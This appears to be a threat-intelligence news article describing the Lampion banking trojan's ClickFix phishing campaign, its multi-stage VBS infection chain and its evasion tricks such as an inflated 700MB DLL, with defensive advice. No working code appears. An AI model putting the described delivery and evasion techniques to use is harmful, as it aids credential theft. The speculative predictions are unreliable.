Listen to this Post

Introduction: The Rise of Brazil’s Silent Cyber Predator
Cybercrime has entered a new phase in Brazil. What was once the playground of amateur hackers has now become a sophisticated hub for financial malware. Among these digital predators, the Lampion banking trojan stands out as one of the most cunning. Originally designed to steal banking credentials, this malicious tool has evolved significantly, now employing a new infection strategy known as ClickFix — a manipulative social engineering technique that tricks victims into executing malware themselves.
Since mid-2024, this upgraded campaign has spread rapidly across Portuguese-speaking nations, blending human deception with technical innovation. Behind the scenes, organized Brazilian threat actors have crafted a web of phishing emails, fake receipts, and PowerShell scripts that quietly steal data while slipping past modern antivirus tools.
Lampion Trojan: The Evolution of Deception
The Lampion campaign began as a relatively standard phishing operation. Cybercriminals used compromised email accounts to send messages disguised as payment confirmations or bank transfer receipts. Subject lines like “Proof for verification” or “Payment receipt follows” were meticulously crafted to appear authentic, complete with timestamps and document numbers to reinforce legitimacy.
Each message came with a ZIP attachment, launching a complex multi-stage infection chain when opened. Inside these ZIP files lay HTML documents that encouraged users to follow simple instructions — but this was where the deception reached its peak.
The ClickFix Revolution in Social Engineering
Starting in December 2024, the attackers abandoned the old method of embedding malicious links. Instead, they adopted ClickFix, a social engineering trick first observed by Proofpoint researchers in mid-2024. When victims opened the HTML file, they were met with a message asking them to copy and paste a command into the Windows “Run” box. Believing it was necessary to open a document, victims unknowingly triggered a PowerShell command that downloaded a Visual Basic Script (VBS) file — the first domino in a deadly sequence.
This approach was brilliant in its simplicity. By making the victim manually execute the code, the attackers bypassed browser-based defenses and most security filters. The malware didn’t rely on clicks or macros — it relied on trust.
Multi-Stage Infection Chain
The infection process unfolded in three distinct VBS stages before the Lampion payload took control.
Stage One: The initial VBS file, introduced in June 2025, created persistence by copying itself into the Windows Startup folder via scheduled tasks. Its code was intentionally filled with garbage variables and obfuscated strings to resist reverse engineering.
Stage Two: This script performed HTTP HEAD requests to check communication paths and then downloaded the next stage in small, unrecognizable data chunks.
Stage Three: The final VBS acted as the dropper for the actual Lampion malware, removing traces of the previous files and downloading a massive 700MB DLL payload — bloated deliberately to evade detection platforms like VirusTotal, which has file size limits.
Stealth, Persistence, and Targeted Attacks
Once executed, the malware collected a wide range of system details — machine ID, username, antivirus software, OS type, and more — encoding everything in Base64 before sending it to a command-and-control (C2) server.
Lampion specifically hunted Portuguese banking credentials, a niche that made it both regionally targeted and devastatingly effective. The malware could forcibly close popular browsers including Edge, Chrome, Firefox, Opera, and Brave, ensuring victims would re-enter credentials on compromised pages.
Its infrastructure used multiple VPS hosts, rotating IP addresses, and cloud storage to distribute files. The core C2 server at IP 83.242.96[.]159 has been active since 2024, suggesting a resilient and well-funded operation.
Low Detection Rates, High Impact
Even after months of activity, detection rates remain alarmingly low. The initial ZIP and HTML stages often slip past all major antivirus tools. As of October 2025, only eight antivirus engines identified the first VBS stage as malicious. This low visibility, combined with the use of VMProtect and massive file sizes, gives Lampion near-invisibility in many corporate and consumer environments.
This strategic stealth has made Lampion one of the most enduring banking trojans in recent Brazilian cybercrime history — and one that continues to evolve faster than security solutions can adapt.
What Undercode Say:
The evolution of Lampion represents a critical moment in the ongoing war between cybercriminals and defenders. Unlike traditional phishing attacks that rely on users clicking malicious links, ClickFix transforms social engineering into a direct command-based attack vector. It blurs the line between human error and system vulnerability.
From a cybersecurity perspective, Lampion’s latest version highlights three alarming shifts:
Human-Driven Execution: By instructing victims to manually run PowerShell commands, attackers bypass many automated security controls. It’s psychological hacking at its finest — turning the victim into an unwitting accomplice.
Massive Payload Obfuscation: The 700MB DLL payload is a technical masterpiece of evasion. By inflating its size and using VMProtect, Lampion avoids upload and scanning limitations, effectively hiding in plain sight.
Localized Focus: The trojan’s targeting of Portuguese-speaking users reflects a broader trend of geo-targeted malware, where attackers focus on cultural and linguistic familiarity to increase success rates.
This is not just about stolen bank credentials. Lampion’s infrastructure and tactics suggest a broader goal — potentially building a botnet or credential marketplace. The C2 persistence and layered VBS structure mirror advanced modular malware frameworks, similar to those used by nation-state actors.
Security researchers must also note that ClickFix is not exclusive to Lampion. It can easily be adapted to deliver ransomware, spyware, or corporate data stealers. The biggest threat is not the trojan itself, but the social engineering model it pioneers.
Organizations across Portugal and Brazil need to retrain employees to recognize social engineering beyond email links. Awareness campaigns should emphasize that legitimate documents never require users to paste commands into the “Run” window.
For defenders, proactive detection through behavioral analytics and endpoint monitoring will be essential. Static signature-based tools are no longer enough. As Lampion evolves, it serves as a warning: the next era of cybercrime will weaponize human psychology as much as technology.
🔍 Fact Checker Results
✅ Lampion is confirmed to use the ClickFix method for infection, as documented by Proofpoint.
✅ Campaigns have targeted Portuguese-speaking regions since at least mid-2024.
❌ No verified evidence currently links Lampion directly to ransomware operations.
📊 Prediction
💻 Expect ClickFix-inspired attacks to surge in 2026, with threat actors in Europe and South America adopting similar command-based lures.
🕵️♂️ Lampion’s developers will likely integrate AI-driven anti-detection tools, making static defenses obsolete.
🌐 Security firms may soon treat ClickFix as a new social engineering category, not just a malware delivery technique.
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://www.medium.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon




